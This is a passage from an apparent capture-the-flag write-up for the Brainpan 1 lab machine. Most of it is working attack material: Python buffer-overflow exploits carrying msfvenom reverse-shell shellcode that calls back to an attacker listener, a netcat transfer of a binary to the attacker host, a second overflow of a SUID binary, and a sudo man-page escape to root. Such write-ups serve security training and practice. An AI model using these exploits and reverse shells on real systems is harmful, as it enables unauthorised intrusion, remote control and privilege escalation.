<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>msfvenom <span class="nt">-p</span> windows/shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>192.168.38.1 <span class="nv">LPORT</span><span class="o">=</span>443 <span class="nt">-b</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">00"</span> <span class="nv">EXITFUNC</span><span class="o">=</span>thread <span class="nt">-f</span> c <span class="nt">-o</span> shellcode.txt
</code></pre></div></div>

<p>Finally we craft our exploit adding it with 524 A‚Äôs, then the JMP ESP address in little endian, then with 20 NOPs (No Operation) and the shellcode.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">sys</span>

<span class="n">host</span><span class="o">=</span><span class="s">"192.168.38.131"</span>
<span class="n">port</span><span class="o">=</span><span class="mi">9999</span>

<span class="n">nops</span><span class="o">=</span><span class="s">"</span><span class="se">\x90</span><span class="s">"</span><span class="o">*</span><span class="mi">20</span>
<span class="n">shellcode</span><span class="o">=</span><span class="p">(</span>
        <span class="s">"</span><span class="se">\xdb\xd0\xbf\x94\x41\xa1\xae\xd9\x74\x24\xf4\x58\x33\xc9\xb1</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\x52\x31\x78\x17\x03\x78\x17\x83\x54\x45\x43\x5b\xa8\xae\x01</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\xa4\x50\x2f\x66\x2c\xb5\x1e\xa6\x4a\xbe\x31\x16\x18\x92\xbd</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\xdd\x4c\x06\x35\x93\x58\x29\xfe\x1e\xbf\x04\xff\x33\x83\x07</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\x83\x49\xd0\xe7\xba\x81\x25\xe6\xfb\xfc\xc4\xba\x54\x8a\x7b</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\x2a\xd0\xc6\x47\xc1\xaa\xc7\xcf\x36\x7a\xe9\xfe\xe9\xf0\xb0</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\x20\x08\xd4\xc8\x68\x12\x39\xf4\x23\xa9\x89\x82\xb5\x7b\xc0</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\x6b\x19\x42\xec\x99\x63\x83\xcb\x41\x16\xfd\x2f\xff\x21\x3a</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\x4d\xdb\xa4\xd8\xf5\xa8\x1f\x04\x07\x7c\xf9\xcf\x0b\xc9\x8d</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\x97\x0f\xcc\x42\xac\x34\x45\x65\x62\xbd\x1d\x42\xa6\xe5\xc6</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\xeb\xff\x43\xa8\x14\x1f\x2c\x15\xb1\x54\xc1\x42\xc8\x37\x8e</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\xa7\xe1\xc7\x4e\xa0\x72\xb4\x7c\x6f\x29\x52\xcd\xf8\xf7\xa5</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\x32\xd3\x40\x39\xcd\xdc\xb0\x10\x0a\x88\xe0\x0a\xbb\xb1\x6a</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\xca\x44\x64\x3c\x9a\xea\xd7\xfd\x4a\x4b\x88\x95\x80\x44\xf7</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\x86\xab\x8e\x90\x2d\x56\x59\x5f\x19\x7e\x98\x37\x58\x7e\x9b</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\x7c\xd5\x98\xf1\x92\xb0\x33\x6e\x0a\x99\xcf\x0f\xd3\x37\xaa</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\x10\x5f\xb4\x4b\xde\xa8\xb1\x5f\xb7\x58\x8c\x3d\x1e\x66\x3a</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\x29\xfc\xf5\xa1\xa9\x8b\xe5\x7d\xfe\xdc\xd8\x77\x6a\xf1\x43</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\x2e\x88\x08\x15\x09\x08\xd7\xe6\x94\x91\x9a\x53\xb3\x81\x62</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\x5b\xff\xf5\x3a\x0a\xa9\xa3\xfc\xe4\x1b\x1d\x57\x5a\xf2\xc9</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\x2e\x90\xc5\x8f\x2e\xfd\xb3\x6f\x9e\xa8\x85\x90\x2f\x3d\x02</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\xe9\x4d\xdd\xed\x20\xd6\xfd\x0f\xe0\x23\x96\x89\x61\x8e\xfb</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\x29\x5c\xcd\x05\xaa\x54\xae\xf1\xb2\x1d\xab\xbe\x74\xce\xc1</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\xaf\x10\xf0\x76\xcf\x30</span><span class="s">"</span><span class="p">)</span>

<span class="c1">#EIP: 311712f3
</span><span class="nb">buffer</span><span class="o">=</span><span class="s">"</span><span class="se">\x41</span><span class="s">"</span><span class="o">*</span><span class="mi">524</span> <span class="o">+</span> <span class="s">"</span><span class="se">\xf3\x12\x17\x31</span><span class="s">"</span> <span class="o">+</span> <span class="n">nops</span> <span class="o">+</span> <span class="n">shellcode</span>

<span class="k">try</span><span class="p">:</span>
    <span class="n">s</span><span class="o">=</span><span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span><span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">settimeout</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">host</span><span class="p">,</span><span class="n">port</span><span class="p">))</span>
    <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Sending shellcode.."</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="s">f"</span><span class="si">{</span><span class="nb">buffer</span><span class="si">}</span><span class="s"> </span><span class="se">\n\r</span><span class="s">"</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="s">"latin-1"</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Check your netcat listener"</span><span class="p">)</span>
<span class="k">except</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Couldn't connect with the server"</span><span class="p">)</span>
    <span class="n">sys</span><span class="p">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
</code></pre></div></div>

<p>We need to set up a netcat listener in this case on port 443 and run the final exploit.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>python3 poc5.py
Sending shellcode..
Check your netcat listener
</code></pre></div></div>

<p>And we get a reverse shell from our test machine.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>nc <span class="nt">-vlnp</span> 443
listening on <span class="o">[</span>any] 443 ...
connect to <span class="o">[</span>192.168.38.1] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>192.168.38.131] 49170
Microsoft Windows <span class="o">[</span>Versin 6.1.7601]
Copyright <span class="o">(</span>c<span class="o">)</span> 2009 Microsoft Corporation. Reservados todos los derechos.

C:<span class="se">\U</span>sers<span class="se">\J</span>ohn<span class="se">\D</span>esktop&gt;whoami
<span class="nb">whoami
</span>pc<span class="se">\j</span>ohn
</code></pre></div></div>

<h2 id="exploitation">Exploitation</h2>
<h3 id="buffer-overflow">Buffer Overflow</h3>

<p>To exploit the target machine, we generate a linux shellcode.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>msfvenom <span class="nt">-p</span> linux/x86/shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>192.168.179.1 <span class="nv">LPORT</span><span class="o">=</span>443 <span class="nt">-b</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">00"</span> <span class="nv">EXITFUNC</span><span class="o">=</span>thread <span class="nt">-f</span> c <span class="nt">-o</span> linux_shellcode.txt
</code></pre></div></div>

<p>At this point we just need to replace the windows shellcode with the linux shellcode.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">sys</span>

<span class="n">host</span><span class="o">=</span><span class="s">"192.168.179.159"</span>
<span class="n">port</span><span class="o">=</span><span class="mi">9999</span>

<span class="n">nops</span><span class="o">=</span><span class="s">"</span><span class="se">\x90</span><span class="s">"</span><span class="o">*</span><span class="mi">20</span>
<span class="n">shellcode</span><span class="o">=</span><span class="p">(</span>
        <span class="s">"</span><span class="se">\xbd\xce\x9e\x7f\xbd\xd9\xee\xd9\x74\x24\xf4\x5a\x29\xc9\xb1</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\x12\x31\x6a\x12\x83\xea\xfc\x03\xa4\x90\x9d\x48\x09\x76\x96</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\x50\x3a\xcb\x0a\xfd\xbe\x42\x4d\xb1\xd8\x99\x0e\x21\x7d\x92</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\x30\x8b\xfd\x9b\x37\xea\x95\xdb\x60\xbf\x64\xb4\x72\xc0\x67</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\xff\xfa\x21\xd7\x99\xac\xf0\x44\xd5\x4e\x7a\x8b\xd4\xd1\x2e</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\x23\x89\xfe\xbd\xdb\x3d\x2e\x6d\x79\xd7\xb9\x92\x2f\x74\x33</span><span class="s">"</span> <span class="o">+</span>
        <span class="s">"</span><span class="se">\xb5\x7f\x71\x8e\xb6</span><span class="s">"</span><span class="p">)</span>

<span class="c1">#EIP: 311712f3
</span><span class="nb">buffer</span><span class="o">=</span><span class="s">"</span><span class="se">\x41</span><span class="s">"</span><span class="o">*</span><span class="mi">524</span> <span class="o">+</span> <span class="s">"</span><span class="se">\xf3\x12\x17\x31</span><span class="s">"</span> <span class="o">+</span> <span class="n">nops</span> <span class="o">+</span> <span class="n">shellcode</span>

<span class="k">try</span><span class="p">:</span>
    <span class="n">s</span><span class="o">=</span><span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span><span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">settimeout</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">host</span><span class="p">,</span><span class="n">port</span><span class="p">))</span>
    <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Sending shellcode.."</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="s">f"</span><span class="si">{</span><span class="nb">buffer</span><span class="si">}</span><span class="s"> </span><span class="se">\n\r</span><span class="s">"</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="s">"latin-1"</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Check your netcat listener."</span><span class="p">)</span>
<span class="k">except</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Couldn't connect with the server"</span><span class="p">)</span>
    <span class="n">sys</span><span class="p">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
</code></pre></div></div>

<p>We set up a netcat listener on port 443 and run the exploit.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>python3 exploit.py
Sending shellcode..
Check your netcat listener.
</code></pre></div></div>

<p>We got a linux reverse shell and upgraded it  to a TTY shell.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>nc <span class="nt">-vlnp</span> 443                         
listening on <span class="o">[</span>any] 443 ...
connect to <span class="o">[</span>192.168.179.1] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>192.168.179.159] 45814
<span class="nb">id  
</span><span class="nv">uid</span><span class="o">=</span>1002<span class="o">(</span>puck<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1002<span class="o">(</span>puck<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1002<span class="o">(</span>puck<span class="o">)</span>
python <span class="nt">-c</span> <span class="s2">"import pty;pty.spawn('/bin/bash')"</span>
puck@brainpan:/home/puck<span class="err">$</span>
</code></pre></div></div>

<p>Listing the SUID binaries I found one called validate, which belongs to user anansi.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>puck@brainpan:/home/puck<span class="nv">$ </span>find / <span class="nt">-perm</span> <span class="nt">-4000</span> <span class="nt">-type</span> f <span class="nt">-exec</span> <span class="nb">ls</span> <span class="nt">-la</span> <span class="o">{}</span> <span class="se">\;</span> 2&gt;/dev/null 
...
<span class="nt">-rwsr-xr-x</span> 1 anansi anansi 8761 Mar  4  2013 /usr/local/bin/validate
...
</code></pre></div></div>

<p>This binary file takes a string as input and tries to validate it.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>puck@brainpan:/home/puck<span class="nv">$ </span>/usr/local/bin/validate
usage /usr/local/bin/validate &lt;input&gt;
puck@brainpan:/home/puck<span class="nv">$ </span>/usr/local/bin/validate bash
validating input...passed.
</code></pre></div></div>

<p>This looks interesting, so I transferred it to the attacking machine.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>nc <span class="nt">-vlnp</span> 3333 <span class="o">&gt;</span> validate

puck@brainpan:/home/puck<span class="nv">$ </span><span class="nb">cat</span> /usr/local/bin/validate | nc 192.168.179.1 3333
</code></pre></div></div>

<p>Debugging the binary file, I passed as input 500 A‚Äôs and the EIP was overwritten causing a segmentation fault.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>gdb <span class="nt">-q</span> validate                                 
Reading symbols from validate...
<span class="o">(</span>gdb<span class="o">)</span> r <span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('A'*500)"</span><span class="si">)</span>
Starting program: /root/brainpan1/validate <span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('A'*500)"</span><span class="si">)</span>

Program received signal SIGSEGV, Segmentation fault.
0x41414141 <span class="k">in</span> ?? <span class="o">()</span>
</code></pre></div></div>

<p>So I discovered that the EIP is overwritten after 116 bytes.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">(</span>gdb<span class="o">)</span> r <span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('A'*116 + 'B'*4)"</span><span class="si">)</span>
Starting program: /root/brainpan1/validate <span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('A'*116 + 'B'*4)"</span><span class="si">)</span>

Program received signal SIGSEGV, Segmentation fault.
0x42424242 <span class="k">in</span> ?? <span class="o">()</span>
</code></pre></div></div>

<p>We need a way to execute the shellcode, I looked for a JMP ESP instruction but nothing, so I decided search for a CALL EAX instruction and found two address.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>/usr/share/framework2/msfelfscan <span class="nt">-f</span> validate <span class="nt">-j</span> esp     
root@kali:~/brainpan1<span class="nv">$ </span>/usr/share/framework2/msfelfscan <span class="nt">-f</span> validate <span class="nt">-j</span> eax
0x080484af   call eax
0x0804862b   call eax
</code></pre></div></div>

<p>But we don‚Äôt know where the CALL EAX instruction in pointing, so I debugged the binary again and found that this points directly to the beginning of the buffer of A‚Äôs.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">(</span>gdb<span class="o">)</span> x/wx <span class="nv">$eax</span>
0xffffd3d8:     0x41414141
</code></pre></div></div>

<p>The next step is to generate the shellcode that allows us to execute a /bin/sh.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>msfvenom <span class="nt">-p</span> linux/x86/exec <span class="nt">-e</span> x86/shikata_ga_nai <span class="nv">cmd</span><span class="o">=</span>/bin/sh <span class="nt">-f</span> c <span class="nt">-o</span> priv_esc_shellcode.txt

root@kali:~/brainpan1<span class="nv">$ </span><span class="nb">tail</span> <span class="nt">-n</span> +2 priv_esc_shellcode.txt | <span class="nb">sed</span> <span class="s1">'s/;//;s/"//g'</span> | <span class="nb">tr</span> <span class="nt">-d</span> <span class="s1">'\n'</span> 
<span class="se">\x</span>bf<span class="se">\x</span>c3<span class="se">\x</span>32<span class="se">\x</span>97<span class="se">\x</span>4f<span class="se">\x</span><span class="nb">dd</span><span class="se">\x</span>c0<span class="se">\x</span>d9<span class="se">\x</span>74<span class="se">\x</span>24<span class="se">\x</span>f4<span class="se">\x</span>5a<span class="se">\x</span>31<span class="se">\x</span>c9<span class="se">\x</span>b1<span class="se">\x</span>0b<span class="se">\x</span>83<span class="se">\x</span>c2<span class="se">\x</span>04<span class="se">\x</span>31<span class="se">\x</span>7a<span class="se">\x</span>11<span class="se">\x</span>03<span class="se">\x</span>7a<span class="se">\x</span>11<span class="se">\x</span>e2<span class="se">\x</span>36<span class="se">\x</span>58<span class="se">\x</span>9c<span class="se">\x</span>17<span class="se">\x</span>21<span class="se">\x</span>cf<span class="se">\x</span>c4<span class="se">\x</span>cf<span class="se">\x</span>7c<span class="se">\x</span>93<span class="se">\x</span>81<span class="se">\x</span>f7<span class="se">\x</span>16<span class="se">\x</span>7c<span class="se">\x</span>e1<span class="se">\x</span>9f<span class="se">\x</span>e6<span class="se">\x</span>ea<span class="se">\x</span>2a<span class="se">\x</span>02<span class="se">\x</span>8f<span class="se">\x</span>84<span class="se">\x</span>bd<span class="se">\x</span>21<span class="se">\x</span>1d<span class="se">\x</span>b1<span class="se">\x</span>b6<span class="se">\x</span>a5<span class="se">\x</span>a1<span class="se">\x</span>41<span class="se">\x</span>e8<span class="se">\x</span>c7<span class="se">\x</span>c8<span class="se">\x</span>2f<span class="se">\x</span>d9<span class="se">\x</span>74<span class="se">\x</span>62<span class="se">\x</span>b0<span class="se">\x</span>72<span class="se">\x</span>28<span class="se">\x</span>fb<span class="se">\x</span>51<span class="se">\x</span>b1<span class="se">\x</span>4e
</code></pre></div></div>

<p>The generated shellcode is 70 bytes, so we can use it without problems, another tiny shellcode that works perfectly you can find it <a href="http://shell-storm.org/shellcode/files/shellcode-841.php">here</a>.</p>

<p>With this information I can build the malicious instructions, adding with 20 NOPs, then the 70 bytes shellcode, then with the remaining NOPs to complete the buffer of 116 bytes, and finally the CALL EAX instruction in little endian.</p>

<p>Now we are the user ananci.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>puck@brainpan:/home/puck<span class="nv">$ </span>/usr/local/bin/validate <span class="si">$(</span>python <span class="nt">-c</span> <span class="s2">"print('</span><span class="se">\x</span><span class="s2">90'*20 + '</span><span class="se">\x</span><span class="s2">bf</span><span class="se">\x</span><span class="s2">c3</span><span class="se">\x</span><span class="s2">32</span><span class="se">\x</span><span class="s2">97</span><span class="se">\x</span><span class="s2">4f</span><span class="se">\x</span><span class="s2">dd</span><span class="se">\x</span><span class="s2">c0</span><span class="se">\x</span><span class="s2">d9</span><span class="se">\x</span><span class="s2">74</span><span class="se">\x</span><span class="s2">24</span><span class="se">\x</span><span class="s2">f4</span><span class="se">\x</span><span class="s2">5a</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">c9</span><span class="se">\x</span><span class="s2">b1</span><span class="se">\x</span><span class="s2">0b</span><span class="se">\x</span><span class="s2">83</span><span class="se">\x</span><span class="s2">c2</span><span class="se">\x</span><span class="s2">04</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">7a</span><span class="se">\x</span><span class="s2">11</span><span class="se">\x</span><span class="s2">03</span><span class="se">\x</span><span class="s2">7a</span><span class="se">\x</span><span class="s2">11</span><span class="se">\x</span><span class="s2">e2</span><span class="se">\x</span><span class="s2">36</span><span class="se">\x</span><span class="s2">58</span><span class="se">\x</span><span class="s2">9c</span><span class="se">\x</span><span class="s2">17</span><span class="se">\x</span><span class="s2">21</span><span class="se">\x</span><span class="s2">cf</span><span class="se">\x</span><span class="s2">c4</span><span class="se">\x</span><span class="s2">cf</span><span class="se">\x</span><span class="s2">7c</span><span class="se">\x</span><span class="s2">93</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">f7</span><span class="se">\x</span><span class="s2">16</span><span class="se">\x</span><span class="s2">7c</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">9f</span><span class="se">\x</span><span class="s2">e6</span><span class="se">\x</span><span class="s2">ea</span><span class="se">\x</span><span class="s2">2a</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">8f</span><span class="se">\x</span><span class="s2">84</span><span class="se">\x</span><span class="s2">bd</span><span class="se">\x</span><span class="s2">21</span><span class="se">\x</span><span class="s2">1d</span><span class="se">\x</span><span class="s2">b1</span><span class="se">\x</span><span class="s2">b6</span><span class="se">\x</span><span class="s2">a5</span><span class="se">\x</span><span class="s2">a1</span><span class="se">\x</span><span class="s2">41</span><span class="se">\x</span><span class="s2">e8</span><span class="se">\x</span><span class="s2">c7</span><span class="se">\x</span><span class="s2">c8</span><span class="se">\x</span><span class="s2">2f</span><span class="se">\x</span><span class="s2">d9</span><span class="se">\x</span><span class="s2">74</span><span class="se">\x</span><span class="s2">62</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">28</span><span class="se">\x</span><span class="s2">fb</span><span class="se">\x</span><span class="s2">51</span><span class="se">\x</span><span class="s2">b1</span><span class="se">\x</span><span class="s2">4e' + '</span><span class="se">\x</span><span class="s2">90'*(116-70-20) + '</span><span class="se">\x</span><span class="s2">af</span><span class="se">\x</span><span class="s2">84</span><span class="se">\x</span><span class="s2">04</span><span class="se">\x</span><span class="s2">08')"</span><span class="si">)</span>
<span class="nv">$ </span><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>1002<span class="o">(</span>puck<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1002<span class="o">(</span>puck<span class="o">)</span> <span class="nv">euid</span><span class="o">=</span>1001<span class="o">(</span>anansi<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1001<span class="o">(</span>anansi<span class="o">)</span>,1002<span class="o">(</span>puck<span class="o">)</span>
<span class="nv">$ </span><span class="nb">whoami
</span>anansi
</code></pre></div></div>

<h2 id="privilege-escalation">Privilege Escalation</h2>
<h3 id="sudo-permissions">Sudo Permissions</h3>

<p>Listing the sudo permissions I discovered that we can run a binary called anansi_util without password.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>                                                                                                                                                           
<span class="nb">sudo</span> <span class="nt">-l</span>                                                                                                                                                             
Matching Defaults entries <span class="k">for </span>puck on this host:                                                                                                                    
    env_reset, mail_badpass,                                                                                                                                        
    <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin                                                                                   
                                                                                                                                                                    
User puck may run the following commands on this host:                                                                                                              
    <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /home/anansi/bin/anansi_util
</code></pre></div></div>

<p>In this binary the manual page is allowed, we can leverage of this to get root.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">sudo</span> /home/anansi/bin/anansi_util
<span class="nb">sudo</span> /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util <span class="o">[</span>action]
Where <span class="o">[</span>action] is one of:
  - network
  - proclist
  - manual <span class="o">[</span><span class="nb">command</span><span class="o">]</span>
</code></pre></div></div>

<p>To elevate our privileges to root I typed into the bash manual !/bin/bash, as follows.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">sudo</span> /home/anansi/bin/anansi_util manual bash
<span class="nb">sudo</span> /home/anansi/bin/anansi_util manual bash
No manual entry <span class="k">for </span>manual
WARNING: terminal is not fully functional
-  <span class="o">(</span>press RETURN<span class="o">)!</span>/bin/bash
<span class="o">!</span>/bin/bash
root@brainpan:/usr/share/man# <span class="nb">id
id
</span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@brainpan:/usr/share/man# <span class="nb">cd
cd
</span>root@brainpan:~# <span class="nb">ls
ls
</span>b.txt
root@brainpan:~# <span class="nb">cat </span>b.txt
<span class="nb">cat </span>b.txt
_|                            _|                                        
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                          
                                            _|


                                              http://www.techorganic.com 

</code></pre></div></div>
:ET